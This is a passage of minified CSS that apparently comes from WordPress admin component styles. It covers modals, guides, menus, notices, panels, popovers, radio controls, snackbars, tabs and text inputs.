border-bottom:none; height:64px; padding:0; position:sticky; } .components-guide .components-modal__header .components-button{ align-self:flex-start; margin:8px 8px 0 0; position:static; } .components-guide .components-modal__header .components-button:hover svg{ fill:#fff; } .components-guide .components-guide__container{ display:flex; flex-direction:column; justify-content:space-between; margin-top:-64px; min-height:100%; } .components-guide .components-guide__page{ display:flex; flex-direction:column; justify-content:center; position:relative; } @media (min-width:600px){ .components-guide .components-guide__page{ min-height:300px; } } .components-guide .components-guide__footer{ align-content:center; display:flex; height:36px; justify-content:center; margin:0 0 24px; padding:0 32px; position:relative; width:100%; } .components-guide .components-guide__page-control{ margin:0; text-align:center; } .components-guide .components-guide__page-control li{ display:inline-block; margin:0; } .components-guide .components-guide__page-control .components-button{ color:#e0e0e0; margin:-6px 0; } .components-guide .components-guide__page-control li[aria-current=step] .components-button{ color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-modal__frame.components-guide{ border:none; max-height:575px; min-width:312px; } @media (max-width:600px){ .components-modal__frame.components-guide{ margin:auto; max-width:calc(100vw - 32px); } } .components-button.components-guide__back-button,.components-button.components-guide__finish-button,.components-button.components-guide__forward-button{ position:absolute; } .components-button.components-guide__back-button{ left:32px; } .components-button.components-guide__finish-button,.components-button.components-guide__forward-button{ right:32px; } [role=region]{ position:relative; } .is-focusing-regions [role=region]:focus:after,[role=region].interface-interface-skeleton__content:focus-visible:after{ bottom:0; content:""; left:0; pointer-events:none; position:absolute; right:0; top:0; z-index:1000000; } .is-focusing-regions .editor-post-publish-panel,.is-focusing-regions .interface-interface-skeleton__actions .editor-layout__toggle-entities-saved-states-panel,.is-focusing-regions .interface-interface-skeleton__actions .editor-layout__toggle-publish-panel,.is-focusing-regions .interface-interface-skeleton__sidebar .editor-layout__toggle-sidebar-panel,.is-focusing-regions [role=region]:focus:after,.is-focusing-regions.is-distraction-free .interface-interface-skeleton__header .edit-post-header,[role=region].interface-interface-skeleton__content:focus-visible:after{ outline-color:var(--wp-admin-theme-color); outline-offset:calc(var(--wp-admin-border-width-focus)*-2/var(--wp-block-editor-iframe-zoom-out-scale, 1)); outline-style:solid; outline-width:calc(var(--wp-admin-border-width-focus)*2/var(--wp-block-editor-iframe-zoom-out-scale, 1)); } .components-menu-group+.components-menu-group{ border-top:1px solid #1e1e1e; padding-top:8px; } .components-menu-group+.components-menu-group.has-hidden-separator{ border-top:none; margin-top:0; padding-top:0; } .components-menu-group:has(>div:empty){ display:none; } .components-menu-group__label{ color:#757575; font-size:11px; font-weight:500; margin-bottom:12px; margin-top:4px; padding:0 8px; text-transform:uppercase; white-space:nowrap; } .components-menu-item__button,.components-menu-item__button.components-button{ width:100%; } .components-menu-item__button.components-button[role=menuitemcheckbox] .components-menu-item__item:only-child,.components-menu-item__button.components-button[role=menuitemradio] .components-menu-item__item:only-child,.components-menu-item__button[role=menuitemcheckbox] .components-menu-item__item:only-child,.components-menu-item__button[role=menuitemradio] .components-menu-item__item:only-child{ box-sizing:initial; padding-right:48px; } .components-menu-item__button .components-menu-items__item-icon,.components-menu-item__button.components-button .components-menu-items__item-icon{ display:inline-block; flex:0 0 auto; } .components-menu-item__button .components-menu-items__item-icon.has-icon-right,.components-menu-item__button.components-button .components-menu-items__item-icon.has-icon-right{ margin-left:24px; margin-right:-2px; } .components-menu-item__button .components-menu-item__shortcut+.components-menu-items__item-icon.has-icon-right,.components-menu-item__button.components-button .components-menu-item__shortcut+.components-menu-items__item-icon.has-icon-right{ margin-left:8px; } .components-menu-item__button .block-editor-block-icon,.components-menu-item__button.components-button .block-editor-block-icon{ margin-left:-2px; margin-right:8px; } .components-menu-item__button.components-button.is-primary,.components-menu-item__button.is-primary{ justify-content:center; } .components-menu-item__button.components-button.is-primary .components-menu-item__item,.components-menu-item__button.is-primary .components-menu-item__item{ margin-right:0; } .components-menu-item__button.components-button:disabled.is-tertiary,.components-menu-item__button.components-button[aria-disabled=true].is-tertiary,.components-menu-item__button:disabled.is-tertiary,.components-menu-item__button[aria-disabled=true].is-tertiary{ background:none; color:var(--wp-components-color-accent-darker-10, var(--wp-admin-theme-color-darker-10, #2145e6)); opacity:.3; } .components-menu-item__info-wrapper{ display:flex; flex-direction:column; margin-right:auto; } .components-menu-item__info{ color:#757575; font-size:12px; margin-top:4px; white-space:normal; } .components-menu-item__item{ align-items:center; display:inline-flex; margin-right:auto; min-width:160px; white-space:nowrap; } .components-menu-item__shortcut{ align-self:center; color:currentColor; display:none; margin-left:auto; margin-right:0; padding-left:24px; } @media (min-width:480px){ .components-menu-item__shortcut{ display:inline; } } .components-menu-items-choice,.components-menu-items-choice.components-button{ height:auto; min-height:40px; } .components-menu-items-choice svg,.components-menu-items-choice.components-button svg{ margin-right:12px; } .components-menu-items-choice.components-button.has-icon,.components-menu-items-choice.has-icon{ padding-left:12px; } .components-modal__screen-overlay{ background-color:#00000059; bottom:0; display:flex; left:0; position:fixed; right:0; top:0; z-index:100000; } @keyframes __wp-base-styles-fade-in{ 0%{ opacity:0; } to{ opacity:1; } } @media not (prefers-reduced-motion){ .components-modal__screen-overlay{ animation:__wp-base-styles-fade-in .08s linear 0s; animation-fill-mode:forwards; } } @keyframes __wp-base-styles-fade-out{ 0%{ opacity:1; } to{ opacity:0; } } @media not (prefers-reduced-motion){ .components-modal__screen-overlay.is-animating-out{ animation:__wp-base-styles-fade-out .08s linear 80ms; animation-fill-mode:forwards; } } .components-modal__frame{ box-sizing:border-box; } .components-modal__frame *,.components-modal__frame :after,.components-modal__frame :before{ box-sizing:inherit; } .components-modal__frame{ animation-fill-mode:forwards; animation-name:components-modal__appear-animation; animation-timing-function:cubic-bezier(.29, 0, 0, 1); background:#fff; border-radius:8px 8px 0 0; box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005; color:#1e1e1e; display:flex; margin:40px 0 0; overflow:hidden; width:100%; } .components-modal__frame h1,.components-modal__frame h2,.components-modal__frame h3{ color:#1e1e1e; } @media not (prefers-reduced-motion){ .components-modal__frame{ animation-duration:var(--modal-frame-animation-duration); } } .components-modal__screen-overlay.is-animating-out .components-modal__frame{ animation-name:components-modal__disappear-animation; animation-timing-function:cubic-bezier(1, 0, .2, 1); } @media (min-width:600px){ .components-modal__frame{ border-radius:8px; margin:auto; max-height:calc(100% - 128px); max-width:calc(100% - 32px); min-width:350px; width:auto; } } @media (min-width:600px) and (min-width:600px){ .components-modal__frame.is-full-screen{ height:calc(100% - 32px); max-height:none; width:calc(100% - 32px); } } @media (min-width:600px) and (min-width:782px){ .components-modal__frame.is-full-screen{ height:calc(100% - 80px); max-width:none; width:calc(100% - 80px); } } @media (min-width:600px){ .components-modal__frame.has-size-large,.components-modal__frame.has-size-medium,.components-modal__frame.has-size-small{ width:100%; } .components-modal__frame.has-size-small{ max-width:384px; } .components-modal__frame.has-size-medium{ max-width:512px; } .components-modal__frame.has-size-large{ max-width:840px; } } @media (min-width:960px){ .components-modal__frame{ max-height:70%; } } @keyframes components-modal__appear-animation{ 0%{ opacity:0; transform:scale(.9); } to{ opacity:1; transform:scale(1); } } @keyframes components-modal__disappear-animation{ 0%{ opacity:1; transform:scale(1); } to{ opacity:0; transform:scale(.9); } } .components-modal__header{ align-items:center; border-bottom:1px solid #0000; box-sizing:border-box; display:flex; flex-direction:row; height:72px; justify-content:space-between; left:0; padding:24px 32px 8px; position:absolute; top:0; width:100%; z-index:10; } .components-modal__header .components-modal__header-heading{ font-size:1.2rem; font-weight:600; } .components-modal__header h1{ line-height:1; margin:0; } .components-modal__content.has-scrolled-content:not(.hide-header) .components-modal__header{ border-bottom-color:#ddd; } .components-modal__header+p{ margin-top:0; } .components-modal__header-heading-container{ align-items:center; display:flex; flex-direction:row; flex-grow:1; justify-content:flex-start; } .components-modal__header-icon-container{ display:inline-block; } .components-modal__header-icon-container svg{ max-height:36px; max-width:36px; padding:8px; } .components-modal__content{ flex:1; margin-top:72px; overflow:auto; padding:4px 32px 32px; } .components-modal__content.hide-header{ margin-top:0; padding-top:32px; } .components-modal__content.is-scrollable:focus-visible{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; outline-offset:-2px; } .components-notice{ align-items:center; background-color:#fff; border-left:4px solid var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); color:#1e1e1e; display:flex; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; padding:8px 12px; } .components-notice.is-dismissible{ position:relative; } .components-notice.is-success{ background-color:#eff9f1; border-left-color:#4ab866; } .components-notice.is-warning{ background-color:#fef8ee; border-left-color:#f0b849; } .components-notice.is-error{ background-color:#f4a2a2; border-left-color:#cc1818; } .components-notice__content{ flex-grow:1; margin:4px 25px 4px 0; } .components-notice__actions{ display:flex; flex-wrap:wrap; } .components-notice__action.components-button,.components-notice__action.components-button.is-link{ margin-left:12px; } .components-notice__action.components-button.is-secondary{ vertical-align:initial; } .components-notice__action.components-button{ margin-right:8px; } .components-notice__dismiss{ align-self:flex-start; color:#757575; flex-shrink:0; } .components-notice__dismiss:not(:disabled):not([aria-disabled=true]):focus,.components-notice__dismiss:not(:disabled):not([aria-disabled=true]):not(.is-secondary):active,.components-notice__dismiss:not(:disabled):not([aria-disabled=true]):not(.is-secondary):hover{ background-color:initial; color:#1e1e1e; } .components-notice__dismiss:not(:disabled):not([aria-disabled=true]):not(.is-secondary):hover{ box-shadow:none; } .components-notice-list{ box-sizing:border-box; max-width:100vw; } .components-notice-list .components-notice__content{ line-height:2; margin-bottom:12px; margin-top:12px; } .components-notice-list .components-notice__action.components-button{ display:block; margin-left:0; margin-top:8px; } .components-panel{ background:#fff; border:1px solid #e0e0e0; } .components-panel>.components-panel__body:first-child,.components-panel>.components-panel__header:first-child{ margin-top:-1px; } .components-panel>.components-panel__body:last-child,.components-panel>.components-panel__header:last-child{ border-bottom-width:0; } .components-panel+.components-panel{ margin-top:-1px; } .components-panel__body{ border-bottom:1px solid #e0e0e0; border-top:1px solid #e0e0e0; } .components-panel__body h3{ margin:0 0 .5em; } .components-panel__body.is-opened{ padding:16px; } .components-panel__header{ align-items:center; border-bottom:1px solid #ddd; box-sizing:initial; display:flex; flex-shrink:0; height:47px; justify-content:space-between; padding:0 16px; } .components-panel__header h2{ color:inherit; font-size:inherit; margin:0; } .components-panel__body+.components-panel__body,.components-panel__body+.components-panel__header,.components-panel__header+.components-panel__body,.components-panel__header+.components-panel__header{ margin-top:-1px; } .components-panel__body>.components-panel__body-title{ display:block; font-size:inherit; margin-bottom:0; margin-top:0; padding:0; } @media not (prefers-reduced-motion){ .components-panel__body>.components-panel__body-title{ transition:background .1s ease-in-out; } } .components-panel__body.is-opened>.components-panel__body-title{ margin:-16px -16px 5px; } .components-panel__body>.components-panel__body-title:hover{ background:#f0f0f0; border:none; } .components-panel__body-toggle.components-button{ border:none; box-shadow:none; color:#1e1e1e; font-weight:500; outline:none; padding:16px 48px 16px 16px; position:relative; text-align:left; width:100%; } @media not (prefers-reduced-motion){ .components-panel__body-toggle.components-button{ transition:background .1s ease-in-out; } } .components-panel__body-toggle.components-button{ height:auto; } .components-panel__body-toggle.components-button:focus{ border-radius:0; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-panel__body-toggle.components-button .components-panel__arrow{ color:#1e1e1e; position:absolute; right:16px; top:50%; transform:translateY(-50%); fill:currentColor; } @media not (prefers-reduced-motion){ .components-panel__body-toggle.components-button .components-panel__arrow{ transition:color .1s ease-in-out; } } body.rtl .components-panel__body-toggle.components-button .dashicons-arrow-right{ -ms-filter:fliph; filter:FlipH; margin-top:-10px; transform:scaleX(-1); } .components-panel__icon{ color:#757575; margin:-2px 0 -2px 6px; } .components-panel__body-toggle-icon{ margin-right:-5px; } .components-panel__color-title{ float:left; height:19px; } .components-panel__row{ align-items:center; display:flex; justify-content:space-between; margin-top:8px; min-height:36px; } .components-panel__row select{ min-width:0; } .components-panel__row label{ flex-shrink:0; margin-right:12px; max-width:75%; } .components-panel__row:empty,.components-panel__row:first-of-type{ margin-top:0; } .components-panel .circle-picker{ padding-bottom:20px; } .components-placeholder.components-placeholder{ align-items:flex-start; box-sizing:border-box; color:#1e1e1e; display:flex; flex-direction:column; font-size:13px; gap:16px; margin:0; padding:24px; position:relative; text-align:left; width:100%; -moz-font-smoothing:subpixel-antialiased; -webkit-font-smoothing:subpixel-antialiased; background-color:#fff; border-radius:2px; box-shadow:inset 0 0 0 1px #1e1e1e; outline:1px solid #0000; } .components-placeholder__error,.components-placeholder__fieldset,.components-placeholder__instructions,.components-placeholder__label{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; letter-spacing:normal; line-height:normal; text-transform:none; } .components-placeholder__label{ align-items:center; display:flex; font-weight:600; } .components-placeholder__label .block-editor-block-icon,.components-placeholder__label .dashicon,.components-placeholder__label>svg{ margin-right:4px; fill:currentColor; } @media (forced-colors:active){ .components-placeholder__label .block-editor-block-icon,.components-placeholder__label .dashicon,.components-placeholder__label>svg{ fill:CanvasText; } } .components-placeholder__label:empty{ display:none; } .components-placeholder__fieldset,.components-placeholder__fieldset form{ display:flex; flex-direction:row; flex-wrap:wrap; gap:16px; justify-content:flex-start; width:100%; } .components-placeholder__fieldset form p,.components-placeholder__fieldset p{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; } .components-placeholder__fieldset.is-column-layout,.components-placeholder__fieldset.is-column-layout form{ flex-direction:column; } .components-placeholder__input[type=url]{ border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:16px; line-height:normal; padding:6px 8px; } @media not (prefers-reduced-motion){ .components-placeholder__input[type=url]{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .components-placeholder__input[type=url]{ font-size:13px; line-height:normal; } } .components-placeholder__input[type=url]:focus{ border-color:var(--wp-admin-theme-color); box-shadow:0 0 0 .5px var(--wp-admin-theme-color); outline:2px solid #0000; } .components-placeholder__input[type=url]::-webkit-input-placeholder{ color:#1e1e1e9e; } .components-placeholder__input[type=url]::-moz-placeholder{ color:#1e1e1e9e; } .components-placeholder__input[type=url]:-ms-input-placeholder{ color:#1e1e1e9e; } .components-placeholder__input[type=url]{ flex:1 1 auto; } .components-placeholder__error{ gap:8px; width:100%; } .components-placeholder__fieldset .components-button:not(.is-link)~.components-button.is-link{ margin-left:10px; margin-right:10px; } .components-placeholder__fieldset .components-button:not(.is-link)~.components-button.is-link:last-child{ margin-right:0; } .components-placeholder.is-medium .components-placeholder__instructions,.components-placeholder.is-small .components-placeholder__instructions{ display:none; } .components-placeholder.is-medium .components-placeholder__fieldset,.components-placeholder.is-medium .components-placeholder__fieldset form,.components-placeholder.is-small .components-placeholder__fieldset,.components-placeholder.is-small .components-placeholder__fieldset form{ flex-direction:column; } .components-placeholder.is-medium .components-button,.components-placeholder.is-medium .components-placeholder__fieldset>*,.components-placeholder.is-small .components-button,.components-placeholder.is-small .components-placeholder__fieldset>*{ justify-content:center; width:100%; } .components-placeholder.is-small{ padding:16px; } .components-placeholder.has-illustration{ backdrop-filter:blur(100px); backface-visibility:hidden; background-color:initial; border-radius:0; box-shadow:none; color:inherit; display:flex; } .is-dark-theme .components-placeholder.has-illustration{ background-color:#0000001a; } .components-placeholder.has-illustration .components-placeholder__fieldset{ margin-left:0; margin-right:0; } .components-placeholder.has-illustration .components-button,.components-placeholder.has-illustration .components-placeholder__instructions,.components-placeholder.has-illustration .components-placeholder__label{ opacity:0; pointer-events:none; } @media not (prefers-reduced-motion){ .components-placeholder.has-illustration .components-button,.components-placeholder.has-illustration .components-placeholder__instructions,.components-placeholder.has-illustration .components-placeholder__label{ transition:opacity .1s linear; } } .is-selected>.components-placeholder.has-illustration .components-button,.is-selected>.components-placeholder.has-illustration .components-placeholder__instructions,.is-selected>.components-placeholder.has-illustration .components-placeholder__label{ opacity:1; pointer-events:auto; } .components-placeholder.has-illustration:before{ background:currentColor; bottom:0; content:""; left:0; opacity:.1; pointer-events:none; position:absolute; right:0; top:0; } .components-placeholder.has-illustration{ overflow:hidden; } .is-selected .components-placeholder.has-illustration{ overflow:auto; } .components-placeholder__preview{ display:flex; justify-content:center; } .components-placeholder__illustration{ box-sizing:initial; height:100%; left:50%; position:absolute; top:50%; transform:translate(-50%, -50%); width:100%; stroke:currentColor; opacity:.25; } .components-popover{ box-sizing:border-box; } .components-popover *,.components-popover :after,.components-popover :before{ box-sizing:inherit; } .components-popover{ will-change:transform; z-index:1000000; } .components-popover.is-expanded{ bottom:0; left:0; position:fixed; right:0; top:0; z-index:1000000 !important; } .components-popover__content{ background:#fff; border-radius:4px; box-shadow:0 0 0 1px #ccc,0 2px 3px #0000000d,0 4px 5px #0000000a,0 12px 12px #00000008,0 16px 16px #00000005; box-sizing:border-box; width:min-content; } .is-alternate .components-popover__content{ border-radius:2px; box-shadow:0 0 0 1px #1e1e1e; } .is-unstyled .components-popover__content{ background:none; border-radius:0; box-shadow:none; } .components-popover.is-expanded .components-popover__content{ box-shadow:0 -1px 0 0 #ccc; height:calc(100% - 48px); overflow-y:visible; position:static; width:auto; } .components-popover.is-expanded.is-alternate .components-popover__content{ box-shadow:0 -1px 0 #1e1e1e; } .components-popover__header{ align-items:center; background:#fff; display:flex; height:48px; justify-content:space-between; padding:0 8px 0 16px; } .components-popover__header-title{ overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:100%; } .components-popover__close.components-button{ z-index:5; } .components-popover__arrow{ display:flex; height:14px; pointer-events:none; position:absolute; width:14px; } .components-popover__arrow:before{ background-color:#fff; content:""; height:2px; left:1px; position:absolute; right:1px; top:-1px; } .components-popover__arrow.is-top{ bottom:-14px !important; transform:rotate(0); } .components-popover__arrow.is-right{ left:-14px !important; transform:rotate(90deg); } .components-popover__arrow.is-bottom{ top:-14px !important; transform:rotate(180deg); } .components-popover__arrow.is-left{ right:-14px !important; transform:rotate(-90deg); } .components-popover__triangle{ display:block; flex:1; } .components-popover__triangle-bg{ fill:#fff; } .components-popover__triangle-border{ fill:#0000; stroke-width:1px; stroke:#ccc; } .is-alternate .components-popover__triangle-border{ stroke:#1e1e1e; } .components-radio-control{ border:0; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; margin:0; padding:0; } .components-radio-control__group-wrapper.has-help{ margin-block-end:12px; } .components-radio-control__option{ align-items:center; column-gap:8px; display:grid; grid-template-columns:auto 1fr; grid-template-rows:auto minmax(0, max-content); } .components-radio-control__input[type=radio]{ border:1px solid #1e1e1e; border-radius:50%; grid-column:1; grid-row:1; height:24px; margin-right:12px; max-width:24px; min-width:24px; position:relative; transition:none; width:24px; } @media not (prefers-reduced-motion){ .components-radio-control__input[type=radio]{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .components-radio-control__input[type=radio]{ height:16px; max-width:16px; min-width:16px; width:16px; } } .components-radio-control__input[type=radio]:checked:before{ background-color:#fff; border:4px solid #fff; box-sizing:inherit; height:12px; left:50%; margin:0; position:absolute; top:50%; transform:translate(-50%, -50%); width:12px; } @media (min-width:600px){ .components-radio-control__input[type=radio]:checked:before{ height:8px; width:8px; } } .components-radio-control__input[type=radio]:focus{ box-shadow:0 0 0 2px #fff, 0 0 0 4px var(--wp-admin-theme-color); } .components-radio-control__input[type=radio]:checked{ background:var(--wp-admin-theme-color); border:none; } .components-radio-control__input[type=radio]{ appearance:none; cursor:pointer; display:inline-flex; margin:0; padding:0; } .components-radio-control__input[type=radio]:focus{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff, 0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color); outline:2px solid #0000; outline-offset:2px; } .components-radio-control__input[type=radio]:checked{ background:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-radio-control__input[type=radio]:checked:before{ border-radius:50%; content:""; } .components-radio-control__label{ cursor:pointer; grid-column:2; grid-row:1; line-height:24px; } @media (min-width:600px){ .components-radio-control__label{ line-height:16px; } } .components-radio-control__option-description{ grid-column:2; grid-row:2; padding-block-start:4px; } .components-radio-control__option-description.components-radio-control__option-description{ margin-top:0; } .components-resizable-box__handle{ display:none; height:23px; width:23px; z-index:2; } .components-resizable-box__container.has-show-handle .components-resizable-box__handle{ display:block; } .components-resizable-box__handle>div{ height:100%; outline:none; position:relative; width:100%; z-index:2; } .components-resizable-box__container>img{ width:inherit; } .components-resizable-box__handle:after{ background:#fff; border-radius:50%; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)), 0 1px 1px #00000008, 0 1px 2px #00000005, 0 3px 3px #00000005, 0 4px 4px #00000003; content:""; cursor:inherit; display:block; height:15px; outline:2px solid #0000; position:absolute; right:calc(50% - 8px); top:calc(50% - 8px); width:15px; } .components-resizable-box__side-handle:before{ background:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); border-radius:9999px; content:""; cursor:inherit; display:block; height:3px; position:absolute; right:calc(50% - 1px); top:calc(50% - 1px); width:3px; } @media not (prefers-reduced-motion){ .components-resizable-box__side-handle:before{ transition:transform .1s ease-in; will-change:transform; } } .components-resizable-box__side-handle:before{ opacity:0; } .components-resizable-box__corner-handle,.components-resizable-box__side-handle{ z-index:2; } .components-resizable-box__side-handle.components-resizable-box__handle-bottom,.components-resizable-box__side-handle.components-resizable-box__handle-bottom:before,.components-resizable-box__side-handle.components-resizable-box__handle-top,.components-resizable-box__side-handle.components-resizable-box__handle-top:before{ border-left:0; border-right:0; left:0; width:100%; } .components-resizable-box__side-handle.components-resizable-box__handle-left,.components-resizable-box__side-handle.components-resizable-box__handle-left:before,.components-resizable-box__side-handle.components-resizable-box__handle-right,.components-resizable-box__side-handle.components-resizable-box__handle-right:before{ border-bottom:0; border-top:0; height:100%; top:0; } @media not (prefers-reduced-motion){ .components-resizable-box__side-handle.components-resizable-box__handle-bottom:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-bottom:hover:before,.components-resizable-box__side-handle.components-resizable-box__handle-top:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-top:hover:before{ animation:components-resizable-box__top-bottom-animation .1s ease-out 0s; animation-fill-mode:forwards; } .components-resizable-box__side-handle.components-resizable-box__handle-left:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-left:hover:before,.components-resizable-box__side-handle.components-resizable-box__handle-right:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-right:hover:before{ animation:components-resizable-box__left-right-animation .1s ease-out 0s; animation-fill-mode:forwards; } } @media not all and (min-resolution:0.001dpcm){ @supports (-webkit-appearance:none){ .components-resizable-box__side-handle.components-resizable-box__handle-bottom:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-bottom:hover:before,.components-resizable-box__side-handle.components-resizable-box__handle-left:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-left:hover:before,.components-resizable-box__side-handle.components-resizable-box__handle-right:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-right:hover:before,.components-resizable-box__side-handle.components-resizable-box__handle-top:active:before,.components-resizable-box__side-handle.components-resizable-box__handle-top:hover:before{ animation:none; } } } @keyframes components-resizable-box__top-bottom-animation{ 0%{ opacity:0; transform:scaleX(0); } to{ opacity:1; transform:scaleX(1); } } @keyframes components-resizable-box__left-right-animation{ 0%{ opacity:0; transform:scaleY(0); } to{ opacity:1; transform:scaleY(1); } } .components-resizable-box__handle-right{ right:-11.5px; } .components-resizable-box__handle-left{ left:-11.5px; } .components-resizable-box__handle-top{ top:-11.5px; } .components-resizable-box__handle-bottom{ bottom:-11.5px; } .components-responsive-wrapper{ align-items:center; display:flex; justify-content:center; max-width:100%; position:relative; } .components-responsive-wrapper__content{ display:block; max-width:100%; width:100%; } .components-sandbox{ overflow:hidden; } iframe.components-sandbox{ width:100%; } body.lockscroll,html.lockscroll{ overflow:hidden; } .components-select-control__input{ outline:0; -webkit-tap-highlight-color:rgba(0, 0, 0, 0) !important; } .components-snackbar{ backdrop-filter:blur(16px) saturate(180%); background:#000000d9; border-radius:4px; box-shadow:0 1px 2px #0000000d,0 2px 3px #0000000a,0 6px 6px #00000008,0 8px 8px #00000005; box-sizing:border-box; color:#fff; cursor:pointer; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; max-width:600px; padding:12px 20px; pointer-events:auto; width:100%; } @media (min-width:600px){ .components-snackbar{ width:fit-content; } } .components-snackbar:focus{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-snackbar.components-snackbar-explicit-dismiss{ cursor:default; } .components-snackbar .components-snackbar__content-with-icon{ padding-left:24px; position:relative; } .components-snackbar .components-snackbar__icon{ left:-8px; position:absolute; top:-2.9px; } .components-snackbar .components-snackbar__dismiss-button{ cursor:pointer; margin-left:24px; } .components-snackbar__action.components-button,.components-snackbar__action.components-external-link{ color:#fff; flex-shrink:0; margin-left:32px; } .components-snackbar__action.components-button:focus,.components-snackbar__action.components-external-link:focus{ box-shadow:none; outline:1px dotted #fff; } .components-snackbar__action.components-button:hover,.components-snackbar__action.components-external-link:hover{ color:currentColor; text-decoration:none; } .components-snackbar__content{ align-items:baseline; display:flex; justify-content:space-between; line-height:1.4; } .components-snackbar-list{ box-sizing:border-box; pointer-events:none; position:absolute; width:100%; z-index:100000; } .components-snackbar-list__notice-container{ padding-top:8px; position:relative; } .components-tab-panel__tabs{ align-items:stretch; display:flex; flex-direction:row; } .components-tab-panel__tabs[aria-orientation=vertical]{ flex-direction:column; } .components-tab-panel__tabs-item{ background:#0000; border:none; border-radius:0; box-shadow:none; cursor:pointer; font-weight:500; height:48px !important; margin-left:0; padding:3px 16px; position:relative; } .components-tab-panel__tabs-item:focus:not(:disabled){ box-shadow:none; outline:none; position:relative; } .components-tab-panel__tabs-item:after{ background:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); border-radius:0; bottom:0; content:""; height:calc(var(--wp-admin-border-width-focus)*0); left:0; pointer-events:none; position:absolute; right:0; } @media not (prefers-reduced-motion){ .components-tab-panel__tabs-item:after{ transition:all .1s linear; } } .components-tab-panel__tabs-item.is-active:after{ height:calc(var(--wp-admin-border-width-focus)*1); outline:2px solid #0000; outline-offset:-1px; } .components-tab-panel__tabs-item:before{ border-radius:2px; bottom:12px; box-shadow:0 0 0 0 #0000; content:""; left:12px; pointer-events:none; position:absolute; right:12px; top:12px; } @media not (prefers-reduced-motion){ .components-tab-panel__tabs-item:before{ transition:all .1s linear; } } .components-tab-panel__tabs-item:focus-visible:before{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; } .components-tab-panel__tab-content:focus{ box-shadow:none; outline:none; } .components-tab-panel__tab-content:focus-visible{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; outline-offset:0; } .components-text-control__input,.components-text-control__input[type=color],.components-text-control__input[type=date],.components-text-control__input[type=datetime-local],.components-text-control__input[type=datetime],.components-text-control__input[type=email],.components-text-control__input[type=month],.components-text-control__input[type=number],.components-text-control__input[type=password],.components-text-control__input[type=tel],.components-text-control__input[type=text],.components-text-control__input[type=time],.components-text-control__input[type=url],.components-text-control__input[type=week]{ background:var(--wp-components-color-background, #fff); border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; color:var(--wp-components-color-foreground, #1e1e1e); font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:16px; height:32px; line-height:normal; margin:0; padding:6px 8px; width:100%; } @media not (prefers-reduced-motion){ .components-text-control__input,.components-text-control__input[type=color],.components-text-control__input[type=date],.components-text-control__input[type=datetime-local],.components-text-control__input[type=datetime],.components-text-control__input[type=email],.components-text-control__input[type=month],.components-text-control__input[type=number],.components-text-control__input[type=password],.components-text-control__input[type=tel],.components-text-control__input[type=text],.components-text-control__input[type=time],.components-text-control__input[type=url],.components-text-control__input[type=week]{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .components-text-control__input,.components-text-control__input[type=color],.components-text-control__input[type=date],.components-text-control__input[type=datetime-local],.components-text-control__input[type=datetime],.components-text-control__input[type=email],.components-text-control__input[type=month],.components-text-control__input[type=number],.components-text-control__input[type=password],.components-text-control__input[type=tel],.components-text-control__input[type=text],.components-text-control__input[type=time],.components-text-control__input[type=url],.components-text-control__input[type=week]{ font-size:13px; line-height:normal; } } 